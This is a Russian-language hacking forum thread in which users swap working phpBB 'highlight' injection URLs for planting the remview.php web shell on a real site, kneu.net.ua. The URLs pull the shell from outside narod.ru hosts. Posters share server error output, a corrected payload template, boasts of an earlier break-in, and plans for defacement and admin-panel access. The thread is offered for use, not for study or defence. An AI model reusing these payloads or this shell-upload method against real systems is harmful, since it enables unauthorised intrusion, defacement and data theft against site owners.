Вопрос про заливку шелла через уязвимость в highligh

хмм... ти рмивиев качал с этого сайта?

 

Помойму да (точно не помню), и эта фигня у меня уже не в первый раз!

 

Взломал один сайт и вот что там написали:

Колонка редактора

С нашим любимым сайтом позабавлялась одна нискосортная единица рода человеческого. Причем, скажу вам честно, крайне невовремя. Хоть на выходных ерундой страдал бы чтоли?

Некоторое время будут недоступны несколько разделов.

Но нет причин к беспокойству — у сайта есть бекап. Так что это вопрос времени.

Всем спасибо, даже тебе, дурачек. Буду знать, что мир не без мудаков.
___________________________________________
Он меня обидил!
Хотябы поблагодарил за то что я сломал его дерьмо...

 

Люди, ну чего такое блин, ну не хочет:
http://kneu.net.ua/forum/viewtopic.php?t=14&xxx=http://salogta.narod.ru/remview.php?c=d&d=/usr/local/psa/home/vhosts/kneu.net.ua/httpdocs/forum/images/avatars/gallery&highlight=%2527.include($_GET[xxx]).include%2527
Ну кто знает что я не правильно делаю???

 

ты не дописал имя скрипта...
И вообще, запрос ошибочный!
Такой надо юзать!

viewtopic.php?a=http://твой_ремотер&b=твоё_имя_файла&t=1&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527

 

Ну не получаеться даже таким способом!
http://kneu.net.ua/forum/viewtopic.php?a=http://salogta.narod.ru/remview.php&b=help.php&t=14&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527
Смотри- http://kneu.net.ua/forum/help.php

 

При загрузки пишет - Warning: copy(help.php): failed to open stream: Permission denied in /usr/local/psa/home/vhosts/kneu.net.ua/httpdocs/forum/viewtopic.php(1104) : regexp code on line 1

 

дык.. у меня такая же проблема.. вточности... тоже самое пишет =(((

может не правильный ремвиев? так как когда только появилось видео.. я брал ремвиев с сайта www.supermegalox.narod.ru/remview.php и ВСЁ РАБОТАЛО !!! (но сейчас по-моему сайт прикрыли)

мож на античатовском ремвиеве надо что-то подправить?

 

Может!
Я скачивал и з других сайтов шелл и он тоже не работал..
Так что ктонибуть дайте работающий remview.php! плизззззззззз.

 

А мне вобще почемуто не один файл не залить..

 

remview.php- а как можно загрузить не в корневую папку а например в папку с аватарами?

 

Какой коммандой можно посматреть какие пипки открыты на запись??

 

ну залил я remview ,да ftp доступ есть ,кроме дифейса что можно еще предпринять

 

Ну поидее можеш залесть в алминку сайта (если пассы не в базе данных).